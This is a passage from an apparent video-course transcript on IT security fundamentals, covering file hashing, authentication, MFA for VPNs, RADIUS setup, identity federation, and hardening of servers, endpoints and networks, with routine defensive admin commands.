opens.] It's got one line of text that says "This is line one." Okay, so that's what we've got to work with. Now
what I'm going to do is I'm going to use the Get-FileHash cmdlet – so get-filehash. Now, unlike Linux of
course, PowerShell is not case sensitive. And I'll give it the name of the file I want to run a hash of. That would
be Project1.txt. [He executes the get-filehash .\Project1.txt command.] And we can see the unique SHA256
hash value that's been returned.
Now, much like I can in other environments – like in Linux shells – I can redirect output of that command to a
file for future reference, which is exactly what I want to do. I'm going to use the up arrow key to bring up that
command. And, at the end, I'm going to use the greater than symbol because that will take the screen output
and capture it and dump it into a file instead, which I'm going to call project1hash. [He executes the get-
filehash .\Project1.txt > project1hash command.]
So, if I were to run notepad now against the project1hash file, [He executes the notepad .\Project1hash
command and the project1hash - Notepad window opens.] then we would see – of course – it contains the
SHA256 algorithm listing along with the actual hash and the name and path of the file. Excellent. Notice that
the hash starts with 227AB28. So now what we're going to do is Close that up. And instead, we're going to use
notepad to open up the project1 file – that's the original data. [He executes the notepad project1 command and
the Project1.txt - Notepad window opens.] And we're going to make a change.
I'll add another line that says "This is line two." And I'm going to go ahead and Close and Save that. And
we're going to recompute the hash again. So, to do that...and actually we're simply going to use get-filehash,
and it's going to run against Project1.txt. [He again executes the get-filehash .\Project1.txt command.] Now we
can tell immediately that we have a different returned hash value because now our current returned hash begins
with 082AC where before it started with 227AB28.
So we can now safely say that indeed that file has changed since we last ran the hashing algorithm because we have a different resultant hash value. Now you can also use this when you download files from the Internet
because some web pages will publish a hash value. And, to make sure that you downloaded the right file and
that it has not been tampered with or corrupted, you can run a hashing tool like this one to make sure you get
the same hash posted on the web site. In this video, we learned how to run file hashes in Windows.
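The same published-checksum idea can also be scripted on a Linux or Mac endpoint; this is a hedged sketch with hypothetical URLs and file names, assuming GNU coreutils is available:

  # Download a file plus the vendor's published checksum list (names are examples only)
  curl -LO https://example.com/tool.zip
  curl -LO https://example.com/SHA256SUMS
  # Check only the entries for files we actually downloaded
  sha256sum --ignore-missing -c SHA256SUMS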
[Topic title: Authentication. The presenter is Dan Lachance.] In this video, we'll discuss authentication.
Authentication is a core part of Identity and Access Management. And it really means proof of identity
whether we're talking about a user, a device, or an application. Authentication has multiple categories that can
be used such as something you know. That would include something like a username and a password or a PIN.
Another category for authentication is something you have. That would include things like a PKI certificate or
a hardware or software token or even a smart card. The third category is something you are, which is used for biometric authentication. This includes things like fingerprints, voice recognition, or retinal scans. Multifactor
authentication is often referred to as MFA. It's a combination of at least two authentication categories. So, for
example, something you know like a PIN and something you have like your smart card. So together you can
use that information and that device for authentication.
Multifactor authentication requires items from at least two different authentication categories; two items from the same category do not constitute MFA. So, for example, a username and a password are two items, but they are in the same category – they're both something you know. Therefore, username and password alone are not considered multifactor authentication.
With authentication, we need an identity store. So think of things like user accounts. Where are they stored? So
user accounts then might be stored in an LDAP-compliant database such as the Microsoft Active Directory Domain Services database. We can also configure RADIUS authentication, which allows for a centralized
authentication provider.
Edge devices like network switches and VPN appliances will forward authentication requests from their clients to the RADIUS server. So, in other words, edge network devices like switches, VPN appliances, and wireless routers do not perform authentication themselves; instead they forward it to the RADIUS server, which does the authentication.
Identity Federation is a centralized, trusted identity provider where we have a single copy of credentials. So
applications then themselves do not perform authentication, instead they forward authentication requests to the
identity provider. In turn, the identity provider then sends a digitally signed security token to the app after
successful authentication.
Security tokens can contain what are called claims about users or devices. A claim is basically an assertion
about a user or device such as a date of birth, a department a device resides in, and so on. Identity federation is
often used for Web Single Sign-on for internal or public cloud apps so that users don't have to keep re-entering
the same credentials as they access different applications.
Finally, authentication can also be context based. So, in addition – for example – to a smart card and a PIN, we
might look at the time of day to determine if someone is allowed to authenticate or their location, which could
be based on GPS tracking or the frequency of how often they authenticate or other behavioral characteristics.
In this video, we discussed authentication.
[Topic title: Configure MultiFactor Authentication for VPN Clients. The presenter is Dan Lachance.] In this
video, I'll demonstrate how to configure VPN multifactor authentication. Multifactor authentication can be
required for VPN connectivity. Now, if you think about it, your VPN appliance is in some way exposed to the
public Internet to allow incoming VPN connections in the first place. So usually, we want more than just
standard username and password, which constitutes single-factor authentication.
Instead, what we're going to do here is configure multifactor authentication through the use of a smart card
where the user must have the smart card in their possession and they must know the PIN in order to authenticate to the VPN. Now, depending on your VPN solution, the specific steps will vary. We're going to do it
here in the Windows Server 2012 environment.
So, from the Start menu, I'm going to type network so that I can start the Network Policy Server tool. Now, if
you're using a Windows Server as a VPN device, then this is the software that will make it happen. Also, this is
where you configure your RADIUS server settings for centralized authentication because as we know, VPN
appliances themselves should never actually do the authentication locally, in case they get compromised.
So here in the Network Policy Server tool, [The Network Policy Server window is divided into two sections.
The left section contains the NPS (Local) node. It further includes the Policies subnode. This subnode includes
the Connection Request Policies folder. The section on the right displays the content of the folder selected in
the left section.] over on the left I'm going to expand Policies. And I'm going to go ahead and right-click after I
select Connection Request Policies. There I'm going to choose New. [The New Connection Request Policy
wizard opens. The first page is titled Specify Connection Request Policy Name and Connection Type. It
includes the Policy name text box and Type of network access server drop-down list box.] And I'm going to
call this Incoming VPN Smartcard. [He types this in the Policy name text box.] Now, down below for the Type
of network access server that this connection request policy will be used for, I'm going to choose Remote
Access Server(VPN-Dial up).
Even though my users aren't using dial-up modems, they're connecting over the Internet. And I'll click
Next. [The next page of the wizard is titled Specify Conditions. It includes the Add button.] Now here in the
Specify Conditions dialog box, I'm going to click the Add button. [The Select condition dialog box opens. It
includes the Tunnel Type option. There is the Add button at the bottom of the dialog box.] And, in this case,
notice I have got multiple criteria I can select, but I'm going to just choose the Tunnel Type. [He clicks the Add
button and the Tunnel Type dialog box opens. It includes the Common dial-up and VPN tunnel types section,
which further includes the Layer Two Tunneling Protocol (L2TP) checkbox.] I want to specifically say here
that I only accept connections here for Layer Two Tunneling Protocol (L2TP) assuming that's what my VPN
appliance is configured with because here I'm not actually configuring the VPN appliance, I'm just configuring
the requirement for multifactor authentication.
So I'm going to go ahead and click OK, and I'll click Next. [The Specify Connection Request Forwarding page
of the wizard opens. It includes the Authenticate requests on this server radio button.] Now, at the RADIUS
level, here I can determine whether authentication requests should be handled on this server, which is what I
want because this is actually my RADIUS server with Active Directory user accounts. But notice I do have the
option of forwarding requests to a different RADIUS server. Well, I would have the option if I had additional
servers. Right now it's currently grayed out.
So I'm going to go ahead and click Next on the screen. I didn't change anything. Now, on the Specify
Authentication Methods screen, this is where we're going to do the work to specify that VPN clients must use
multifactor authentication. [This page of the wizard includes the Override network policy authentication
settings checkbox.] So, to do that, I'm going to turn on the checkmark here for the option that says Override
network policy authentication settings because we're going to specify them here.
Now, under EAP Types, I'm going to click the Add button. EAP, of course, stands for Extensible
Authentication Protocol. [The Add EAP dialog box opens. It includes the Microsoft: Smart Card or other
certificate option.] And what I want to choose here is Microsoft: Smart Card or other certificate. So I'm going
to choose that and click OK. And then I'll proceed through the wizard by clicking Next. Now I don't need to
specify any other attributes. So I'll just continue through the wizard until I get to my summary screen where I
will click Finish.
[Now the content of the Connection Request Policies folder includes the Incoming VPN Smartcard policy. Its
status is Enabled and source is Remote Access Server(VPN-Dial up).] So now I've got a connection request policy that requires multifactor VPN authentication through the use of a smart card. Now this is going to
be used when we've got VPN appliances that forward RADIUS authentication requests to this device. In this
video, we learned how to configure VPN multifactor authentication.
[Topic title: Authorization. The presenter is Dan Lachance.] In this video, I'll talk about authorization.
Authorization occurs after successful authentication of a user, a device, or an application. Authorization allows
access to a resource such as a network, a web application, a file, a folder, a database, and so on. Access control
lists – or ACLs – control resource access. With authorization, it's important to adhere to the principle of least privilege, where only the permissions required to complete a job task are granted and no more. There should also be a periodic review of access privileges to ensure that they are still sufficient or, in some cases, to ensure that excessive permissions haven't become the issue. Examples of privileges would include things
like read, write, delete, the ability to modify attributes – for instance – of a file, or to insert a row in a database.
Windows NTFS standard file system permissions include full control, modify, read and execute, list folder
contents, read, write, and special permissions.
Now most of these are pretty self-explanatory. If you have full control, you can do anything you want to the
file. If you have read access, you can read the contents. However, modify and write are a little bit more of a
mystery. A big distinction between modify and write is that modify allows file deletion and write does not.
Special permissions give you a further degree of granularity. For instance, you might want to allow the
creation of folders in a certain location on a server, but not files. Now, if you use the standard permission set
such as the write permission, well that allows the creation of both folders and files. So special permissions let you get much more granular.
In Linux standard file system permissions include read, write, and execute. Now read has a value of four, write
has a value of two, and execute has a value of one. So, for example, for the owner of a file if she had all of
these permissions, then numerically that would be four plus two plus one which equals seven.
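To make that arithmetic concrete, here's a small sketch using a hypothetical script file:

  # 7 = 4+2+1 (rwx) for the owner, 5 = 4+1 (r-x) for the group, 0 = no access for others
  chmod 750 report.sh
  # The long listing shows the resulting mode string: -rwxr-x---
  ls -l report.sh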
[Topic title: RADIUS, TACACS+. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
configure a Windows RADIUS server. So a RADIUS server then is a centralized authentication host. And, to
make that happen on a Windows Server 2012 R2 machine, we need to make sure we have the Network Policy
Server role installed. So, here in PowerShell on my Windows computer, I'm going to run the get-windowsfeature command and I'm going to surround the word policy with wildcard asterisk symbols. In other
words, to get a list of Windows features that contain the word policy. [The presenter executes the get-
windowsfeature *policy* command.]
And here we can clearly see in fact that the Network Policy Server role is installed because there is an [X] in
the box. So the next thing we will do then is start the Network Policy Server GUI tool to configure the
RADIUS server. So, from my Windows Start menu, I'm going to search for the word network. And, when the
Network Policy Server tool shows up, we would go ahead and click on it.
So this is the tool then that we use when we want to configure our Network Policy Server or specifically our
Windows RADIUS server. [The Network Policy Server window opens. The window is divided into two
sections. The left section includes the RADIUS Clients and Servers folder.] So, in the Network Policy Server
tool, the first thing I'm going to do over the left is expand the list of RADIUS Clients and Servers. Now the
idea here is I have to define one or more RADIUS Clients that will forward authentication requests to this
RADIUS server.
So, by virtue of this server having this software installed and being connected to Active Directory, it can act as
a RADIUS authentication server. So, in the left-hand navigator, I'm going to click on RADIUS Clients which
is underneath RADIUS Clients and Servers. [He selects the RADIUS Clients option under the RADIUS Clients
and Servers folder and its content is displayed in the section on the right.] And we see on the right that we
don't have any RADIUS Clients defined.
Now remember a RADIUS client is not the end user trying to connect to the network, for instance, through a
VPN, through an Ethernet switch, or through a wireless router. Instead, the RADIUS client is the edge network device like the VPN appliance, the wireless router, or the Ethernet switch. So they have to be added
here so that they are known by the RADIUS server.
So we're going to right-click on RADIUS Clients and choose New. [The New RADIUS Client dialog box
opens. It includes the Name and Address section, which further includes the Friendly name and Address (IP or
DNS) text boxes. The dialog box also includes the Shared Secret section, which further includes the Shared
secret and Confirm shared secret text boxes.] And, for this first name, I'm going to call it VPN Appliance
1 [He types this in the Friendly name text box.] and I'm going to go ahead and pop in the IP address of my
VPN appliance. [He enters 200.2.35.6 in the Address (IP or DNS) text box.] Now, down below, I'm going to
manually put in a Shared secret that I have to configure on the VPN appliance. This is used for the VPN
appliance to authenticate to this RADIUS server.
So I'm going to go ahead and click OK. [As a result, the VPN Appliance 1 RADIUS Client gets added to the
content of the RADIUS Clients option.] Let's add another one. I'm going to right-click on RADIUS Clients on
the left-hand navigator again and choose New. This time I'm going to call this one wireless access point or
WAP 1. [He types this in the Friendly name text box.] And, in the same way, I'll put in the IP address. But
notice I could put in the actual DNS name of that host if it's configured. [He enters 200.34.67.4 in the Address
(IP or DNS) text box.] And, once again, I can configure either the same or a different Shared secret.
You'll notice that we can build a template where this stuff is just selectable from the list. [He points to the
Select an existing Shared Secrets template drop-down list box under the Shared Secret section.] So, if we
know we are going to configure dozens of VPN or wireless access point clients with the same Shared secret,
maybe it makes sense to build the template first. But here I've only got two. So I don't mind popping in the
same Shared secret. And I'll go ahead and click on OK. [As a result, the WAP 1 RADIUS Client gets added to
the content of the RADIUS Clients option.]
So, now at this point, we've actually got our Windows RADIUS server configured along with two RADIUS clients. Now, if we didn't have the Network Policy Server role installed, we could either use the Server Manager GUI to install it or use PowerShell. Here in PowerShell – let's just search for PowerShell and fire it up – instead of the get-windowsfeature cmdlet, we would use the install-windowsfeature cmdlet followed by the name of the specific component that we wish to install.
And remember, if you are not sure about what the nomenclature is for this stuff, just go ahead and search for it like this – so get-windowfeature. Again I'm going to search for the word policy. I'm just guessing – it's Network Policy Server. And of course you need to spell things correctly. It's get-windowsfeature – with an s – not get-windowfeature. [He executes the get-windowsfeature *policy* command. The output is displayed in a tabular
form.] We can see that it's called over here under the name column NPAS-Policy-Server. So that's what we
would use with the install-windowsfeature cmdlet if we needed to install the software if it's not already there.
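For comparison, on a Linux RADIUS server the same idea – registering edge devices as RADIUS clients with a shared secret – is just a configuration entry. This is a hedged sketch assuming FreeRADIUS 3.x; the path varies by distribution, the service unit may be named radiusd instead of freeradius, and the secret shown is only a placeholder:

  # clients.conf entry (e.g. /etc/freeradius/3.0/clients.conf or /etc/raddb/clients.conf)
  client vpn-appliance-1 {
      ipaddr = 200.2.35.6
      secret = ReplaceWithAStrongSharedSecret
  }
  # After editing, restart the service so the new client definition is loaded
  systemctl restart freeradius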
[Topic title: User Provisioning and Deprovisioning. The presenter is Dan Lachance.] In most cases, accessing
a network resource requires a user account. In this video, we'll talk about user provisioning and
deprovisioning. Provisioning would be used for newly hired employees where there is a standard onboarding
process for those new hires, which would include reviewing and signing of acceptable use policies, user
awareness and training about security issues, how to conduct themselves in the corporate environment, and so
on.
Deprovisioning would involve activities such as conducting an exit interview or removing access. For
example, disabling a user account once they've left the company versus deleting their user account. We might
do that so we can still track what they did or take a look at any work they were working on. Or, in some cases, even decrypt things that were encrypted with their user account.
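On a standalone Linux host, for example, disabling rather than deleting could look like this hedged sketch; the user name is hypothetical:

  # Lock the password and expire the account so logins fail, but files and audit history remain
  usermod -L jsmith
  chage -E 0 jsmith
  # Later, if policy allows, remove the account along with its home directory
  # userdel -r jsmith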
Another way to remove access with user deprovisioning is to revoke an associated PKI certificate or
certificates issued to the user and/or devices that they used. For instance, if a user was issued a company
smartphone that could connect to the VPN, that smartphone might use a PKI certificate to authenticate to the VPN. Well, if that certificate is revoked, it can't connect to the VPN anymore.
Common tasks with user provisioning and management overall down to deprovisioning include the creation of
the user account, the modification of the user account while it's in use, for instance, changing attributes such as
last name if somebody gets married or changing a password if it's forgotten. There is the disabling of a user
account. This might be done, for instance, if a user is on sick leave or parental leave. And finally of course
there is user account deletion.
Data from other human resource apps can also be used or integrated with a current solution that might be used.
For instance, we might link Active Directory user accounts with the PeopleSoft application. With user account
creation, users are normally then added to groups after they have an account. Now this is based on their
required access to resources to complete job-specific tasks.
Password policies are also a part of user provisioning, although this is normally automated. For instance, in an
Active Directory environment, we would have a domain Group Policy object that applies to everybody in the
domain so that we have the same password policy in effect. So it would include things like the minimum and
maximum password ages, a minimum password length, password complexity, and so on.
Now, that's not to say that in an Active Directory environment, you can't have password settings for different
groups of users. You can, just not through Group Policy, instead you would configure fine-grained password
policies. In some cases, it's appropriate to use self-service user provisioning where users can request an
account and they can set their own password.
An example of this that we've all come across at some point I'm sure is using a web site that requires a user
account before you can participate in the web site. So, in some cases, you will be able to create a free account
where you can also set your own password. So that's an example of self-service user provisioning.
[Topic title: Identity Federation. The presenter is Dan Lachance.] In this video, we'll talk about identity
federation. Identity federation is related to identity management where we have a centralized identity provider.
This removes the need for redundant user account information. A trust relationship also gets configured between it and relying entities. A relying entity, for example, might be a web application server that we will authenticate user access to.
Resources are configured to trust the identity provider. And, again, that's an example of a relying entity such as
a web application. So this is often also called a relying party. And normally what's done is the public key from
a certificate or key pair used by the identity provider is made available to the relying party.
Applications don't perform authentication, instead they forward the authentication requests from users to the
trusted identity provider for which they now have a public key. So the identity provider then sends a digitally
signed security token to the app after successful authentication for the user or device.
Now the identity provider's private key creates the signature. Apps have the public key that's related so they
can verify the signature for authenticity. Identity providers generate security tokens. The specific component on the identity server that does this is often referred to as a Security Token Service or STS. Security tokens can contain
claims about users or devices.
Claims are assertions that are consumed by apps. So an example might be a date of birth, the department a
device resides in, a user's e-mail address, and so on. The identity provider is also often referred to as a claims
provider as a result of this. This is often used for Web Single Sign-On – SSO – for internal or public cloud
applications so that users don't have to keep providing the same credentials even though they are connecting to
different apps.
There are many benefits to using identity federation, including a reduced cost because we have a single central
identity store, reduced complexity for the same reasons, enhanced security because we're using digitally signed
tokens, and accountability because we have a central definable point where we need to track user account
activity.
It also facilitates on-premises to cloud resource access as well as business-to-business resource access. Let's
take a look at the communication flow with identity federation. Pictured in our diagram in the center we've got
a user station with a web browser. On the left, we've got the identity provider, otherwise called the claims
provider. And, on the right, we've got the web applications, which are otherwise called relying parties.
In transmission number one, the user in their web browser attempts to connect to a web application. Now the
web application is going to be configured to trust the identity provider. So, in transmission number two, the
web application will send back a notification to the user essentially redirecting them to the identity provider.
Now that might come in many different forms, including an HTTP redirect.
So, in transmission number three, the user web browser then – for example – uses that HTTP redirect to
connect to the identity provider where the user is then prompted to provide credentials. So, assuming the user
provides the correct credentials in transmission four from the identity provider, we would have a digitally
signed token that might contain claims – if it's configured for that – that gets sent back to the user station.
Now that could come in many forms, including web browser cookie. So now we would have a cookie –
essentially a signed security session token – that is in the possession of the user on their station. So
transmission number five would be the user station web browser sending that token – which could be a cookie – to the application, which authorizes the user to use the application.
Now, on a large scale with many web applications, this model makes a lot of sense and makes things much
easier over the long term. Common identity federation standards include OAuth – this is the open standard for
authorization – and it gives us the ability to sign in to a third-party web site after signing in to something – like
Google – only once.
SAML is the Security Assertion Markup Language. Common identity federation products include Microsoft
Active Directory Federation Services, which is usually called ADFS; Shibboleth, which is an open source SSO
solution; and OpenID, which is Internet SSO or Single Sign-On where you authenticate once to OpenID and
you are authorized from there for multiple web sites.
[Topic title: Server Vulnerabilities. The presenter is Dan Lachance.] In this video, we'll talk about server
vulnerabilities. Servers are highly sought after by malicious users because, if a server exists, presumably there are multiple people that want to connect to some kind of service that has value on it or data that resides on that host. Servers could be physical, they could be virtual, or we could have a virtualization server – otherwise
called a hypervisor – which is a physical server that runs virtual machine guests.
We have to consider the various platforms that our server operating systems might be running. For instance,
we might be securing our Windows platform, UNIX or Linux, or maybe even a Mac OS X Server. Either way,
there are best practices and guidelines that we can follow in hardening each of those various operating systems.
We then must consider the roles each server plays because different roles will have different vulnerabilities.
So – for instance – with a file server, we have to think about the type of data that will be stored on the file
server and perhaps, for instance, it might be required that we enable multifactor authentication to safeguard
that data – maybe it's financial transaction information or maybe it's personally identifiable information. We
might even categorize the data on the file server and add more metadata to further control resource access.
In the case of a web server, we really are talking about a host supporting HTTP or HTTPS. Now, with an
application server, we're really looking at a web server that has a specific business use. So web server and
application server are similar, but the application server is more tailored to a specific business need. Now, of
course, what we want to do is make sure we're using SSL or TLS to remove any possibility of clear text
transmissions being captured by a malicious user.
DNS servers are crucial because they are a name lookup service. However, we want to make sure that DNS
servers are properly hardened so that malicious users can't poison DNS with fake entries, which would redirect
users potentially to fraudulent sites. DHCP servers should also be hardened so that their configurations cannot
be changed. But another interesting aspect of DHCP is the prevention of rogue DHCP servers on the network
that can hand out incorrect IP addresses to clients.
For that, we are looking at network access control. We have to think about our identity provider – such as
Microsoft Active Directory – to make sure that it can't be compromised since it contains credentials. And, of
course, we might take a look at a PKI server that hosts a Certificate Authority that is used to issue certificates.
So the point then is that there are different considerations when hardening different server roles.
The other thing to consider is whether these roles are collocated on a single server – that can be bad or good. Ideally, we have single-use servers, which makes them easier to configure, manage, and harden. Hardening means we
are increasing security. This is done through numerous methods such as applying firmware updates; patching
the server operating system; and disabling unnecessary services, apps, user accounts, and even computer
accounts.
Server hardening also includes things such as making sure that you're running an up-to-date malware scanner
and using a host based firewall that denies all inbound and outbound traffic by default. So, in other words, we
add exceptions for what should be allowed into servers or traffic that should be allowed to leave. We should also have log forwarding configured to a centralized and secured logging host elsewhere. So that, if a server is compromised and its local logs are wiped, we still have a way to track what happened.
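To make that deny-by-default posture concrete, here's a hedged sketch using ufw on a Linux server; the allowed ports are examples only and would depend on the server's role:

  # Deny everything by default, both inbound and outbound
  ufw default deny incoming
  ufw default deny outgoing
  # Add only the exceptions the role requires, for example HTTPS in and DNS out
  ufw allow 443/tcp
  ufw allow out 53
  ufw enable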
We should also enable appropriate auditing. Now what this means is making sure we don't go overboard and turn on auditing for every action for every user, because then we're overwhelmed with useless information. So, with auditing, we want to make sure we're very selective about who and what we audit. For servers that support it, we should also consider disabling the server GUI. Instead, we should manage servers remotely using GUI tools, or locally or remotely using command line tools.
Depending on the operating system your server is running, you should be following the appropriate operating
system and app configuration best practices. You should change default settings. For example, instead of
leaving the default Windows administrator account, you might rename it to something else. Encryption should
always be used. Not just out on the Internet, but internally as well for data in transit, as well as data at rest.
We should always make sure we're using strong passwords or multifactor authentication. And we should
certainly disable the use of null passwords. That's never a good idea. We should also force periodic password
changes. Up-to-date server disaster recovery plans are absolutely invaluable because they include step-by-step
procedures for things like bare metal restore of failed servers. But this only works properly if each and every
IT technician knows their role in the disaster recovery plan.
We should also establish a baseline of normal server usage for every server. And, of course, this can be
automated over time. We need to know what normal usage is on a given server in a given network environment
so that we can identify anomalies. And we might detect those by using a host-based intrusion prevention
system – otherwise called HIPS. So this would be configured specifically for our environment to detect, notify,
and stop suspicious activity.
Finally, at the physical level, we can't forget about securing our servers this way. So we might do this by
configuring things such as a power-on password that must be known when the server is powered up or a
CMOS password. And we also want to make sure that servers are always locked in a server room or in their
data center racks. We want to make sure that the data center racks have enclosures that lock as well. So we
don't want easy access to servers or the disk arrays that the servers use.
[Topic title: Endpoint Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about endpoint
vulnerabilities. When we talk about endpoint devices, we're really talking about two categories of devices.
We're talking about user devices like smartphones and laptops, but then at the same time we're also talking
about network infrastructure devices. Either way, depending on the type of solution we have – it might be
hardware or it might be software – we need to make sure we apply firmware updates or software patches to fix
any security issues.
This would apply to network infrastructure devices like network switches, VPN appliances, load balancers,
reverse proxies, network firewalls, Wi-Fi access points, servers, and network printers. For example, if we're
using wireless routers, it's important that we keep up to date with the latest firmware revisions in case they
address security vulnerabilities.
Endpoint devices, as mentioned, also include user-based devices such as smartphones, laptops, and so on. So, in
the same way, we should make sure that we apply firmware updates and software patches to user based
endpoint devices. We should also limit the user's ability to change configurations and to install software, which
includes drivers as well as apps from mobile device app stores and whatnot. Now we should limit that on all
types of user based endpoint devices like desktops, laptops, tablets, and smartphones.
A demilitarized zone is the network segment where we place publicly visible servers that need to be visible
that way. So that would include things potentially like public web sites, but it can also include web sites or
FTP servers that are used only by employees. Now a good argument could be made that neither of those should really be publicly accessible if they're only for employees working from home or traveling; instead, maybe they should only be available after the employee establishes a VPN connection.
So certainly we might place a VPN appliance within the demilitarized zone. So then we should also consider
the placement of a reverse proxy that listens for connections to various servers hosted elsewhere. That is also
another prime candidate for a DMZ or demilitarized zone. Strict firewall rules need to exist between the
Internet firewall and the DMZ itself.
For example, if we've got a reverse proxy listening on port 80 for a web server elsewhere, then that firewall –
between the DMZ and the Internet – should allow inbound port 80 traffic destined specifically to the reverse
proxy since it's listening for that connection. Now, in the same way, we should have a second-layer firewall with rules that control traffic between the DMZ and the internal network. So, to continue our example with the reverse proxy listening on TCP port 80 for a web app, maybe our second-level firewall would allow port 80 traffic from the reverse proxy destined for an internal web server hosted elsewhere. We should also consider the use of varying firewall products. Now why is that? Well, generally, using a variety of different types of products increases security because, if a malicious user were to compromise one type of router or firewall by exploiting a known vulnerability, that same hack will not work on a different firewall product from a different vendor. Now, at the same time, it's a double-edged sword, isn't it? Because it increases administrative effort.
Now you've got to track, you know, updates for firmware or perhaps software for different products. You've got
different configurations, different troubleshooting techniques, and so on. We should consider the use of
centralized RADIUS authentication servers. So endpoint network infrastructure devices should never perform
their own authentication. So we really refer here to things like VPN appliances, wireless routers, they should
not actually do the authentication.
These devices are called RADIUS clients. So a RADIUS client isn't an end user on a smartphone trying to
connect to Wi-Fi. That user would be called a supplicant. So the RADIUS client in that example would be the
wireless router. Now the potential problem here is that, if things like wireless routers were to do the actual authentication and they were compromised, they would reveal credentials. So, instead, authentication should be
forwarded from RADIUS clients to a RADIUS server.
RADIUS clients will authenticate to the RADIUS server using a shared secret that gets configured. So,
naturally to harden that, we should be using a strong shared secret over an encrypted connection. Logging is
crucial to track activity, especially after some kind of an intrusion. So, therefore, we should configure log
forwarding for endpoint network infrastructure devices so that the logs are sent elsewhere.
So, if the device is compromised, we still have a record of what occurred. Now we might configure Windows
event log subscriptions. Here, in Server 2012 R2, I'm going to go ahead and click on my Start menu in the
bottom left. I'm going to type event and I'm going to start the Windows Event Viewer tool where log
information is stored. [The Event Viewer window opens. It is divided into three sections. The left section
contains the Event Viewer (Local) node, which further includes the Subscriptions option. The section in the
middle is the content section. The section on the right is titled Actions.]
Over on the left, I'm going to click on Subscriptions where I will right-click on it and then choose Create
Subscription. [The Subscription Properties dialog box opens.] I'm going to call this Sub1. [He types this in the
Subscription name text box.] Windows subscriptions that we're configuring as of right now are used for log
forwarding for centralized logging in Windows. What I'm going to do is leave this on collector initiated. [He
points to the Collector initiated radio button under the Subscription type and source computers section.] This
server will be the collector that will periodically reach out to other hosts on the network to collect log
information.
Of course, I could click the Select Computers button in order to specify those computers that I want to gather
log information from. Down below for events to collect, I would open the drop-down list and Edit the
events. [The Query Filter dialog box opens, which includes the Event level section and Event logs drop-down
list box.] And what I might do, for instance, is say I want to collect Critical, Warning, and Error
messages. [These are some of the checkboxes in the Event level section.] Specifically, let's say from the
Windows system log. [He selects the System option in the Event logs drop-down list box.] And then after that,
I would click OK.
Now what I must do in order for this to work is enable the WinRM or Windows Remote Management service
on target computers I want to collect log information from. Now, after I've done all of this, this machine will periodically – approximately every 15 minutes – poll the configured computers that we have selected so that the log information is stored here centrally.
We can do the same kind of thing with UNIX and Linux systems using the syslog daemon for log forwarding.
The idea is that a compromised device and its logs are absolutely meaningless because they could have been
changed or wiped by an attacker. So centralized logging to a host should be hardened so the host itself should
be hardened and it should also exist on a secured internal network.
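For the UNIX and Linux side just mentioned, a minimal hedged sketch of that log forwarding with rsyslog might look like this; the collector host name is a placeholder:

  # Forward all facilities and severities to the central collector; @@ means TCP, a single @ means UDP
  echo '*.* @@loghost.example.com:514' > /etc/rsyslog.d/60-forward.conf
  systemctl restart rsyslog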
For endpoint vulnerabilities, we should also have some kind of host intrusion detection and prevention system
in place. Now we might also do it at the network level. So a host intrusion detection and prevention system is
designed to look at things that are specific to a host, like application logs. Also it has the ability to decrypt
information that arrives at the host.
Network intrusion detection and prevention systems are designed to look at network traffic for multiple hosts. But,
depending on its configuration, it may not be able to look into the details of encrypted network traffic like a
host system could. And, of course, it's always important to encrypt data transmissions and data at rest both on
internal networks and externally on the Internet.
[Topic title: Network Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about network
vulnerabilities. The goal with network security is to allow only legitimate access to the network. Most attacks
tend to occur from inside the network. So we don't often have malicious users trying to hack in directly from
the outside. Instead, malicious users can get network access and wreak havoc in a number of ways, including
an infected USB thumb drive that user brings into the network or users opening file attachments or clicking
links that trigger malware. Even drive-by web site infections can occur where a user is simply viewing a web
site without even clicking anything.
So we need to consider all network entry points just like we would consider entry and exit points for physical
building security. This includes network switches and their wall jacks that devices plug into. So we should
always disable unused switch ports. And, for those that will be active, we should configure MAC filtering. So
only certain MAC addresses are allowed to be plugged into certain switch ports.
Now, of course, MAC addresses can be spoofed, but this is yet another layer in our security defense. VPN
appliances should always be configured to use multifactor authentication or MFA. This is considered much
more secure and more difficult to crack than standard username and password authentication. Wireless access
points should be configured to use centralized RADIUS authentication as opposed to a preshared key
configured on the device directly.
IEEE 802.1X plays an important role with network security. This is a security standard that hardware and
software can be compliant with. So it applies to wired and wireless network access. The idea is that users and
devices need to be properly authenticated before being allowed on the network. So, this means even before
DHCP would give an IP configuration to a device, it would have to successfully authenticate first.
You may wonder how that's possible. How could a device forward an authentication request to a central server elsewhere if it doesn't even have an IP? It doesn't do it. It's the network access device, like the network switch or the wireless router, that forwards the request on its behalf. So the connecting device doesn't actually need to have a valid IP configuration for this to work.
IEEE 802.1X devices include things like network switches, routers, VPN appliances, and wireless access
points. There is also the physical network access side of things that we want to make sure that we don't forget
about. So, as we've mentioned, we should be disabling unused wall jacks which in the end connect to switch
ports. We should control access to wall jacks even beyond MAC address filtering. So, therefore, wall jacks
should only be available within a secured building or a floor with restricted access or even behind locked doors
in certain parts of the building. That, in conjunction with disabling unused switch ports and MAC filtering, adds to
our layered security defenses. Also wiring closets must always be behind locked doors to prevent things like
wiretapping or rerouting network connections by plugging things into different locations or even plugging in
devices like rogue wireless access points.
On the Wi-Fi side of things, there are a number of things we can do to harden or secure that environment. The
first is user awareness regarding things like rogue access points. A rogue access point is simply a Wi-Fi access
point that isn't authorized to be on the network. So a malicious user could have a rogue wireless access point
that looks legitimate that users connect to. So now the malicious user is seeing all of the user traffic.
We should always apply firmware patches to our Wi-Fi routers. We should also consider disabling remote
Internet administration. We should use HTTPS administration. We should consider disabling the broadcast of
the wireless network name or the SSID. And even though MAC addresses can be spoofed, we should still
enable MAC address filtering.
Our wireless routers, of course, should never do their own authentication, instead they should forward it to a
centralized RADIUS server. And we might even consider the use of a shielded location for Wi-Fi to prevent
the radio signals from emanating beyond a specific area. Rogue network services, as we've mentioned, include things like rogue Wi-Fi access points and DHCP servers that can cause problems on the network. A rogue DHCP server, for instance, could even be considered a denial-of-service attack if a malicious user gets it on the network, because it might give bogus IP information to devices so that they can't connect to anything
legitimate. Then there are misconfigurations for things like network access control lists or ACLs. These are
often called packet filtering rules.
Essentially, we want to make sure that they are set to deny all traffic by default. And so then you should make
allowances only for what is required beyond this default configuration. ARP cache poisoning is another danger if a malicious user gets on the network, in that they could essentially spoof the default gateway or router as being themselves so that all traffic would be forwarded through the malicious user's device.
Denial-of-service attacks, as we've mentioned, come in many forms, which could include network broadcast storms or, as we've mentioned, a rogue DHCP server. A distributed denial-of-service attack is a little bit different in that there are multiple computers involved in the attack, such as flooding a victim host or network
